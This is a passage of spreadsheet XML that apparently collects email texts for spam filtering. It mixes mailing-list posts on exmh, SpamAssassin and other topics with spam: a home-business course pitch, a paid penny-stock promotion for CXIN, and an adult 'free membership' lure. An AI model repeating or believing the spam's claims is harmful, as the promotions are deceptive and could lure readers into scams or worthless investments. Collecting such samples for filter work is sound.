 will have to hire someone to help out"&lt;BR&gt;
 &lt;BR&gt;
 Marshal in area code 407 states to us "I feel bad, you only&lt;BR&gt;
 charged me $259.00 for this course and it is a goldmine. I&lt;BR&gt;
 have added 3 full time people to help me after only having&lt;BR&gt;
 your course for 5 months"&lt;BR&gt;
 &lt;BR&gt;
 &gt;From the above information and actual results you can see&lt;BR&gt;
 why we can state the following:&lt;BR&gt;
 &lt;BR&gt;
 With our course you can own your own successful business.&lt;BR&gt;
 A business which earns you substantial income now and one&lt;BR&gt;
 which could be sold in 3-5 years, paying you enough to&lt;BR&gt;
 retire on and travel the world. A business which is&lt;BR&gt;
 extremely interesting to be in. A Business in which every&lt;BR&gt;
 day is new and exciting.&lt;BR&gt;
 &lt;BR&gt;
 None of your days will be hum-drum. Your brain is&lt;BR&gt;
 Challenged. A business, which protects you from Corporate&lt;BR&gt;
 Downsizing. A business which you can start part time from&lt;BR&gt;
 your home and later, if you so desire, you can work in full&lt;BR&gt;
 time. A business, which is your ticket to freedom from&lt;BR&gt;
 others telling you what to do. A business, which lets you&lt;BR&gt;
 control your own destiny. Our training has made this happen&lt;BR&gt;
 for many others already. Make it happen for you!&lt;BR&gt;
 &lt;BR&gt;
 If the above sounds interesting to you then its time for you&lt;BR&gt;
 to talk to a real live human being, no cost or obligation&lt;BR&gt;
 on your part.&lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGROUND-COLOR=
 : #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;B&gt;Please call us at 1-2`8`1-5`0`0-4`0`1`8&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D=
 "#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PT=
 SIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt;.&lt;BR&gt;
 &lt;BR&gt;
 We have Service Support &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" s=
 tyle=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERI=
 F" FACE=3D"Arial" LANG=3D"0"&gt;&lt;B&gt;staff available to you from 8:00am to&lt;BR&gt;
 10:00pm (Central Time) 7 days a week &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff=
 " BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D1=
 2 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt;. If you callthis num=
 ber&lt;BR&gt;
 you can talk to one of our experienced Customer Support personnel.&lt;BR&gt;
 They can answer any questions you may have - with no obligation.&lt;BR&gt;
 Sometimes we run special pricing on our courses and combinations&lt;BR&gt;
 of courses. When you call our Customer Support line they can let&lt;BR&gt;
 you know of any specials we may be running. If you like what you&lt;BR&gt;
 read and hear about our courses, then the Customer Support person&lt;BR&gt;
 can work with you to place your order. We are very low key. We&lt;BR&gt;
 merely give you the facts and you can then decide if you want to&lt;BR&gt;
 work with us or not.&lt;BR&gt;
 &lt;BR&gt;
 Thank you for your time and interest.&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR=
 : #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"FIXED" FACE=3D"Courier New" LANG=
 =3D"0"&gt;+++++&lt;BR&gt;
 This ad is produced and sent out by: UAS&lt;BR&gt;
 To be  e  r   a  s  e  d  from our mailing list please email us at smiley8=
 2@168city.com  with  " e r a s e " in the sub-line or write us at:AdminScr=
 ipt-Update, P O B 1 2 0 0, O r a n  g e s t a d, A r  u b a&lt;BR&gt;
 ++++++&lt;/FONT&gt;
 &lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffff=
 ff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;B=
 R&gt;
 &lt;BR&gt;&lt;/FONT&gt;
 &lt;BR&gt;{%RAND%}
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;,,,,,,,,,,TO48 6-03 C29 P
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;mw}6"oo
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;&lt;font size=3D"1"&gt;&lt;font color=3D"white"&gt;5849796176976731484864674617967=
 617464684646947976726441619467684696468416837196716976687&lt;/font&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;&lt;marquee&gt;
 &lt;BR&gt;My heart and my soul are lifted to you.
 &lt;BR&gt;I offer my life to you everything I've been through&lt;/marquee&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;&lt;font size=3D"5"&gt;
 &lt;BR&gt;Use it for your glory.&lt;/font&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Minor whoops with glimpse support
</t>
  </si>
  <si>
    <t xml:space="preserve">There are some cases like this with "incomplete ftoc".  These are surely old
 bugs that appeared after I added the ability to only scan the tail of the ftoc
 if for some reason the scan module decides it cannot easily merge the newly
 scanned (scan unseen) into the tail of the cached scan listing.  Hmm - I poked
 around a bit. glimpse.tcl uses Msg_Change, which has code in it to try and
 deal with showing a message that isn't in the ftoc:
         Exmh_Status "Cannot find msg $msgid - Rescan?"
 Is that message hiding in your log?  Perhaps there should be a return from
 Msg_Change that glimpse.tcl can use to decide what to do next.
 &gt;&gt;&gt;Valdis.Kletnieks@vt.edu said:
  &gt; Scenario:
  &gt; 
  &gt; Inbox has a "dirty" ftoc, only the last 100 entries (3500-last or so).
  &gt; 
  &gt; Go to search... glimpse.   Glimpse finds a hit in inbox/3448 (which
  &gt; isn't
  &gt; in the ftoc).  Clicking on that one results in a find tool being
  &gt; launched
  &gt; *on the current item* (which of course misses, since the search string
  &gt; isn't IN that item - I wasn't even in 'inbox' at the time.  We don't
  &gt; change
  &gt; folders to inbox or display the message that got hit.
  &gt; 
  &gt; Clicking on another 'glimpse' hit that was an item that was in a
  &gt; non-dirty
  &gt; ftoc worked as expected - folder changed and that mail displayed, and
  &gt; the search tool found the hit.
  &gt; 
  &gt; /Valdis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</si>
  <si>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On Fri, 6 Sep 2002, Russell Turpin wrote:
 --]want more kids, we have to convince people who are
 --]in their twenties to become parents.
 --]
 Hey give me a break, I was working on finding the right mate. Once I did,
 boomsky theres a puppy and if you would kindly not put on So much preasure
 there culd well be another.
 3 is a magic number...yes it is , its a magic number
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Infectious disease (was Re: Al'Qaeda's fantasy ideology)
</t>
  </si>
  <si>
    <t xml:space="preserve">James Rogers wrote:
 &gt;[...] As I understand it, there is a growing body of genetic evidence
 &gt;that European immune systems are substantially tougher and more
 &gt;resistant to a wider range of infectious diseases than those found in
 &gt;other peoples around the world, [...]
 &gt;
 &gt;The standard theory for this is that Europe was the first major region of
 &gt;the planet to become densely populated and urbanized (to the extent that
 &gt;they "urbanized" a thousand years ago).  [...]
 Another theory is that Europe was a rural backyard until the Renaissance,
 certainly when compared to big urban centres like Constantinople and Baghdad.
 I don't know the genetic studies of which you speak, but I know of one that
 is sort-of relevant: apparently men of Ashkenazi descent are susceptible
 to sickle-cell anemia and the probable reason is that the same genetic
 factor that causes that also protects women from tuberculosis (IIRC), which
 would have come in handy in central European towns at a time when the Jewish
 population was a lot more urbanised than average Joes.
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [SAtalk] 2.41/2.50 spamd/spamc problem
</t>
  </si>
  <si>
    <t xml:space="preserve">Heh. RTFM.. Sorry about that.
 Yep, that did the trick.
 Thanks for the help!
 Regards,
 Paul Fries
 paul@cwie.net
 -----Original Message-----
 From: spamassassin-talk-admin@example.sourceforge.net
 [mailto:spamassassin-talk-admin@lists.sourceforge.net] On Behalf Of
 Vince Puzzella
 Sent: Thursday, September 12, 2002 11:23 AM
 To: Paul Fries; spamassassin-talk@example.sourceforge.net
 Subject: RE: [SAtalk] 2.41/2.50 spamd/spamc problem
 defang_mime 0
 -----Original Message-----
 From: Paul Fries [mailto:paul@cwie.net] 
 Sent: Thursday, September 12, 2002 2:12 PM
 To: spamassassin-talk@example.sourceforge.net
 Subject: [SAtalk] 2.41/2.50 spamd/spamc problem
 I noticed that after upgrading to 2.41 (or 2.50) from 2.31, the -F
 option was removed from spamd. 
 This is fine because all of the HTML format mail seems to arrive
 properly. However, messages that get tagged as Spam arrive as just html
 source.
 Is there any way around this? I would like all HTML/RTF messages to
 retain their formatting even if they are flagged as spam. I would
 accomplish this on 2.31 by using the "-F 0" flag when starting spamd.
 Thanks!
 Regards,
 Paul Fries
 paul@cwie.net
 CWIE LLC 
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf _______________________________________________
 Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk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</si>
  <si>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Traders                   DQB
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;meta http-equiv=3DContent-Type content=3D"text/html; charset=3D=
 windows-1252"&gt;&lt;title&gt;SPECIAL ALERT&lt;/title&gt;&lt;style&gt;&lt;!--li.MsoNormal{mso-styl=
 e-parent:"";margin-bottom:.0001pt;font-size:12.0pt;font-family:"Times New =
 Roman";margin-left:0in;margin-right:0in;margin-top:0in}.contenttd{font-fam=
 ily:Verdana,Arial,Helvetica,sans-serif;font-size:11px;color:#333333}#conte=
 nt{position:absolute;width:385px;z-index:1;left:0;top:0}--&gt;&lt;/style&gt;&lt;/head&gt;=
 &lt;body&gt;&lt;table cellSpacing=3D0 cellPadding=3D0 width=3D716 bgColor=3D#000000=
  border=3D0&gt;&lt;tr&gt;&lt;td width=3D719 bgcolor=3D#008000&gt;&lt;p align=3Dcenter&gt;&lt;font =
 color=3D#FFFFFF size=3D6&gt;&lt;b&gt;THE WALL STREET WEEKLY&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/t=
 able&gt;&lt;table cellSpacing=3D0 cellPadding=3D2 width=3D671 border=3D0 height=3D=
 803&gt;&lt;tr&gt;&lt;td vAlign=3Dtop align=3Dleft bgColor=3D#000000 height=3D799 width=
 =3D716&gt;&lt;table cellSpacing=3D0 cellPadding=3D3 width=3D582 bgColor=3D#fffff=
 f border=3D0 height=3D649 style=3D"border-collapse: collapse" bordercolor=3D=
 #111111&gt;&lt;tr&gt;&lt;td bgColor=3D#000000 height=3D19 width=3D716&gt;&lt;table cellSpaci=
 ng=3D0 cellPadding=3D0 width=3D706 border=3D0&gt;&lt;tr&gt;&lt;td vAlign=3Dcenter alig=
 n=3Dleft width=3D706&gt;&lt;p align=3Dcenter&gt;&lt;b&gt;&lt;font size=3D4 color=3D#FFFFFF f=
 ace=3DBatang&gt;Stock Pick of The Day:&lt;/font&gt;&lt;font face=3D"Times New Roman, T=
 imes, serif" size=3D4 color=3D#FFFFFF&gt; &lt;/font&gt;&lt;font face=3DBatang color=3D=
 #FFFFFF style=3D"font-size: 15pt"&gt;China Xin Network Media Corp.&lt;/font&gt;&lt;fon=
 t face=3D"Times New Roman, Times, serif" color=3D#FFFFFF&gt;&amp;nbsp; &lt;/font&gt;&lt;fo=
 nt face=3DBatang color=3D#FFFFFF&gt;(OTC BB:CXIN)&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table=
 &gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td vAlign=3Dcenter align=3Dmiddle bgColor=3D#ffffff height=
 =3D110 width=3D362&gt;&lt;table cellSpacing=3D0 cellPadding=3D0 width=3D706 bgCo=
 lor=3D#ffffff border=3D0 height=3D133&gt;&lt;tr&gt;&lt;td vAlign=3Dtop align=3Dleft he=
 ight=3D1 width=3D195 rowspan=3D2&gt;&lt;table cellSpacing=3D0 cellPadding=3D4 wi=
 dth=3D259 border=3D0 align=3Dleft height=3D154&gt;&lt;tr&gt;&lt;td width=3D150 height=3D=
 35&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D93 height=3D35&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D1=
 50 height=3D27&gt;&lt;b&gt;&lt;font face=3D"Times New Roman" color=3D#006600&gt;&lt;u&gt;OPINIO=
 N&lt;/u&gt;:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=3D93 height=3D27&gt;&lt;b&gt;&lt;font face=3D"Times Ne=
 w Roman"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style=3D"font-size: 13pt"&gt;BUY&lt;/spa=
 n&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D150 height=3D19&gt;&lt;b&gt;&lt;font face=3D"Ti=
 mes New Roman" color=3D#006600&gt;&lt;u&gt;SYMBOL&lt;/u&gt;:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=3D9=
 3 height=3D19&gt;&lt;b&gt;&lt;font face=3D"Times New Roman"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href=
 =3Dhttp://finance.yahoo.com/q?s=3DCXIN.OB&amp;d=3Dt&gt;CXIN&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/=
 tr&gt;&lt;tr&gt;&lt;td width=3D150 height=3D19&gt;&lt;b&gt;&lt;font face=3D"Times New Roman" color=
 =3D#006600&gt;Industry:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=3D93 height=3D19 align=3Dlef=
 t&gt;&lt;b&gt;&lt;font face=3D"Times New Roman"&gt;&amp;nbsp; Publishing&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;=
 &lt;tr&gt;&lt;td width=3D150 height=3D19&gt;&lt;b&gt;&lt;font face=3D"Times New Roman" color=3D=
 #006600&gt;Short Term Opinion:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=3D93 height=3D19 alig=
 n=3Dleft&gt;&lt;b&gt;&lt;font face=3D"Times New Roman"&gt;&amp;nbsp;Outperform&lt;/font&gt;&lt;/b&gt;&lt;/td=
 &gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D150 height=3D19&gt;&lt;b&gt;&lt;font face=3D"Times New Roman" co=
 lor=3D#006600&gt;Long Term Opinion:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=3D93 height=3D19=
  align=3Dleft&gt;&lt;font face=3D"Times New Roman"&gt;&lt;b&gt;&amp;nbsp;Accumulate&lt;/b&gt;&lt;/font=
 &gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D150 height=3D19&gt;&lt;b&gt;&lt;font face=3D"Times New Roma=
 n" color=3D#006600&gt;Recent Price:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=3D93 height=3D19=
 &gt;&lt;font face=3D"Times New Roman"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $0.05&lt;/b=
 &gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D150 height=3D19&gt;&lt;b&gt;&lt;font face=3D"Times N=
 ew Roman" color=3D#006600&gt;12 Month Trading Range:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=
 =3D93 height=3D19 align=3Dleft&gt;&lt;b&gt;&lt;font face=3D"Times New Roman"&gt;$0.07 - $=
 0.95&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D150 height=3D19&gt;&lt;b&gt;&lt;font face=3D"=
 Times New Roman" color=3D#006600&gt;Avg. Volume:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=3D9=
 3 height=3D19 align=3Dleft&gt;&lt;b&gt;&lt;font face=3D"Times New Roman"&gt;&amp;nbsp;&amp;nbsp;&amp;=
 nbsp;&amp;nbsp; 47,940&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D150 height=3D19&gt;&lt;b&gt;=
 &lt;font face=3D"Times New Roman" color=3D#006600&gt;Approx. Float:&lt;/font&gt;&lt;/b&gt;&lt;/=
 td&gt;&lt;td width=3D93 height=3D19 align=3Dleft&gt;&lt;b&gt;&lt;font face=3D"Times New Roma=
 n"&gt;&amp;nbsp;&amp;nbsp; 5 Million&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D150 height=3D=
 19&gt;&lt;b&gt;&lt;font face=3D"Times New Roman" color=3D#006600&gt;Insider &amp;amp; Institu=
 tional Holdings:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;td width=3D93 height=3D19 align=3Dleft&gt;&lt;b=
 &gt;&lt;font face=3D"Times New Roman"&gt;92% Shares&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td wid=
 th=3D150 height=3D19&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D93 height=3D19 align=3Dleft&gt;&amp;n=
 bsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;td vAlign=3Dtop align=3Dleft height=3D1 width=3D=
 515&gt;&lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;b&gt;&lt;font face=3D"Times New Roman" color=3D#0000FF style=3D=
 "font-size: 13pt"&gt;&amp;quot; CXIN MEDIA CORPORATION, THE BLOOMBERG OF CHINA.&amp;q=
 uot;&lt;/font&gt;&lt;font face=3DBatang color=3D#008000&gt; &lt;/font&gt;&lt;font color=3D#0080=
 00 face=3D"Times New Roman"&gt;- &lt;/font&gt;&lt;font size=3D2 face=3D"Times New Roma=
 n" color=3D#008000&gt;Finance and Investment Magazine, December 2001&lt;/font&gt;&lt;/=
 b&gt;&lt;p&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td vAlign=3Dtop align=3Dleft height=3D1 width=3D=
 515&gt;&lt;b&gt;&lt;font face=3DBatang size=3D4 color=3D#008000&gt;THE COMPANY:&lt;/font&gt;&lt;/b=
 &gt;&lt;p&gt;&lt;font face=3D"Times New Roman"&gt;CXIN Media Corporation is an integrated=
  media company focusing on the dissemination and aggregation of informatio=
 n. Currently, CXINs core business is in the publishing and aggregation of =
 Financial, Economic, and Business Information on the Peoples Republic of C=
 hina. &lt;u&gt;The value CXIN Media provides is its ability to source, package, =
 and present information that is highly in demand by the market.&lt;/u&gt;&lt;/font&gt;=
 &lt;/p&gt;&lt;p&gt;&lt;font face=3D"Times New Roman"&gt;Apart from the core print and electr=
 onic publishing business, CXIN is involved in other related businesses, su=
 ch as organizing and managing events such as conferences, seminars, and tr=
 aining in the field of wealth management and personal finance.&lt;/font&gt;&lt;/td&gt;=
 &lt;/tr&gt;&lt;tr&gt;&lt;td vAlign=3Dtop align=3Dleft height=3D320 width=3D710 colspan=3D=
 2&gt;&lt;font face=3D"Times New Roman"&gt;These areas are closely linked to the cor=
 e competencies of the company and they intend to leverage on the brands th=
 at they have built to further drive the growth potential.&lt;/font&gt;&lt;p&gt;&lt;font f=
 ace=3D"Times New Roman"&gt;CXIN holds the key to success in the Peoples Repub=
 lic of China. &lt;b&gt;In May of 2001 they acquired the 12 year exclusive right =
 from the China Economic Information Network, a corporation under the direc=
 t management of the State Information Center and the State Planning Develo=
 pment Commission, Chinas highest economic decision body.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;=
 &lt;b&gt;&lt;font face=3DBatang color=3D#008000 size=3D4&gt;HIGHLIGHTS:&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;=
 &lt;p&gt;&lt;font face=3D"Times New Roman"&gt;May 2001, CXIN acquires the 12 year Excl=
 usive license to distribute all information in English, French and Spanish=
 , Internationally.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=3D"Times New Roman"&gt;February 20=
 02, CXIN announced its first distribution contract with a leading market r=
 esearch provider.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=3D"Times New Roman"&gt;March 2002, =
 CXIN announces it had signed with yet another distributor for its unique f=
 inancial , economic and business information on the Peoples Republic of Ch=
 ina.&amp;nbsp;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=3D"Times New Roman"&gt;May 7, 2002, CXIN a=
 nnounces a distribution agreement with Internet Securities, a Euromarket c=
 ompany and the &lt;u&gt;leading provider of emerging market securities&lt;/u&gt;.&lt;/fon=
 t&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=3D"Times New Roman"&gt;May 9, 2002, CXIN announces it had=
  hired one of Asias top media consulting firms, Telesis, and its President=
 , Mr. Cyril Pereira, the former Director of Operation of the South China M=
 orning Post and Asia Magazine.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=3D"Times New Roman"=
 &gt;June 12, 2002, CXIN launched its China Business portal and began selling =
 subscriptions.&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=3D"Times New Roman"&gt;June 24, 2002, =
 CXIN announces the acquisition of&amp;nbsp; &lt;b&gt;Smart Investor Magazine&lt;/b&gt; and=
  related business. &lt;u&gt;This magazine will bring over $1.2 Million in consol=
 idated revenues.&amp;nbsp;&lt;/u&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;font face=3D"Times New Roman"&gt;Jul=
 y 15, 2002, CXIN announces the license agreement with Lexis-Nexis, &lt;u&gt;one =
 of the worlds largest aggregators.&lt;/u&gt;&lt;/font&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;font face=3DBatang=
  size=3D4 color=3D#008000&gt;INVESTMENT CONSIDERATIONS:&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;fon=
 t face=3D"Times New Roman"&gt;According to the reports from Morgan-Stanley, w=
 hich analyzes the worlds superpowers in 11 industries, it only takes 8 yea=
 rs to build a media empire, which means the return on investment in this i=
 ndustry will be far greater than that of pharmaceutical, household merchan=
 dise, energy, or even banking. We believe that CXIN Media is well position=
 ed to become the next superpower of the media market in the fast growing C=
 hinese market. The superior management and its exclusive agreement granted=
  by the Chinese government provide the company with an &amp;quot;unfair advant=
 age&amp;quot; over its potential competitors. We believe that the recent licen=
 se agreements signed with some of the largest information providers in the=
  world as well as the Smart Investor Magazines and related business will e=
 nable the company to meet its revenue and profit expectation of $50 Millio=
 n within the next 5 years and dependent on market condition for refinancin=
 g, we foresee that CXIN Media could easily double their expected revenue a=
 nd profits through strategic acquisitions. The current price of the shares=
  do not reflect the value of this growth company, in comparison to the sec=
 tor CXIN Media should be currently trading between $0.25 to $0.50 and abov=
 e this value when we take into consideration the growth factors.&lt;/font&gt;&lt;/t=
 d&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height=3D23 width=3D716&gt;&lt;font face=3D"Tim=
 es New Roman" size=3D1&gt;Disclaimer:&lt;/font&gt;&lt;font size=3D1&gt; The Wall Street W=
 eekly provides information on selected companies that it believes has inve=
 stment potential. The Wall Street Weekly is not a registered investment ad=
 visor or broker - dealer. This report is provided as an information servic=
 e only, and the statements and opinions in this report should not be const=
 rued as an offer or solicitation to buy or sell any security. The Wall Str=
 eet Weekly accepts no liability for any loss arising from an investors rel=
 iance on or use of this report. An investment in CXIN is considered to be =
 highly speculative and should not be considered unless a person can afford=
  a complete loss of investment. The Wall Street Weekly has been retained t=
 o distribute this report on CXIN and has been paid six hundred dollars by =
 a third party. This report involves forward looking statements, which invo=
 lve risk, and uncertainties that may cause actual results to differ materi=
 ally from those set forth in the forward - looking statements. For further=
  details concerning these risks and uncertainties, see the SEC filings of =
 CXIN including the companys most recent annual and quarterly reports.&lt;/fon=
 t&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td vAlign=3Dtop align=3Dleft height=3D23 width=3D716&gt;&lt;p&gt;&lt;=
 font face=3DArial size=3D1 color=3D#5F5F5F&gt;If you wish to no longer receiv=
 e your FREE subscription or have received this report in error, please cli=
 ck &lt;a href=3Dhttp://www.sendyourfeedback.com/optout&gt;HERE&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;=
 /tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;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</si>
  <si>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 [zzzzteana] Re: FWD (ExT) USA more popular than ever in Britain
</t>
  </si>
  <si>
    <t xml:space="preserve">Now then I recently read a novel about exactly that sorta thing
 happening. Can't remember what is was called tho..maybe something like
 51st State?
 -----Original Message-----
 From: Andrew Dennis [mailto:andrew@fidai.clara.net] 
 Sent: 03 December 2002 08:36
 To: zzzzteana@yahoogroups.com
 Subject: [zzzzteana] Re: FWD (ExT) USA more popular than ever in Britain
 --- In forteana@y..., "uncle_slacky" &lt;robert.chambers@b...&gt; wrote:
 &gt; --- In forteana@y..., Andy &lt;andy@r...&gt; wrote:
 &gt; &gt; then the result would be a resounding 3.
 &gt; 
 &gt; It wouldn't be such a bad idea, because (at least in terms of
 trade) 
 &gt; we have all the disadvantages of a client state combined with all
 the 
 &gt; disadvantages of being a foreign country.
 &gt; 
 &gt; Rob
 &gt; 
 &gt; airstrip one, anyone?
 Not a bad idea at all, provided we avoid Texas's mistake.  If we get 
 two senators for each of Scotland, Norn Iron, Wales and England, plus 
 our fair share of congressthings, we end up with the biggest voting 
 block in the US legislature and for the presidency, with a political 
 spectrum whose extreme right can't poke the extreme left of the 
 current US one with a long, long stick.  One sudden lurch to the left 
 by the US political establishment later, we own the place.
 Byzantium, anyone?
 Andrew D.
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to
 http://docs.yahoo.com/info/terms/ 
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Here is your Free Access
</t>
  </si>
  <si>
    <t xml:space="preserve">###################################
   FREE Adult Lifetime Membership
       Limited Time Offer!!!
 ###################################
 YOUR INSTANT ACCESS PASSWORD
 LOGIN NAME:   zzzz@spamassassin.taint.org 
 PASSWORD:     AcKWGy4L
 5 of the Best Adult Sites on the Internet for FREE!
 ---------------------------
 NEWS 08/28/02
 Over 3.1 Million Members have signed up for FREE, Last month 229,947
 New Members signed up for Free with the limited time offer.
 Are you a FREE Member yet???
 ---------------------------
 Our Membership FAQ
 Q. Why are you offering free access to 5 adult membership sites for free?
 A. We have advertisers that pay us for ad space so you don't have to
 pay for a membership.
 Q. Is it true that your membership is Free for life?
 A. Absolutely, you'll never have to pay a cent the advertisers do.
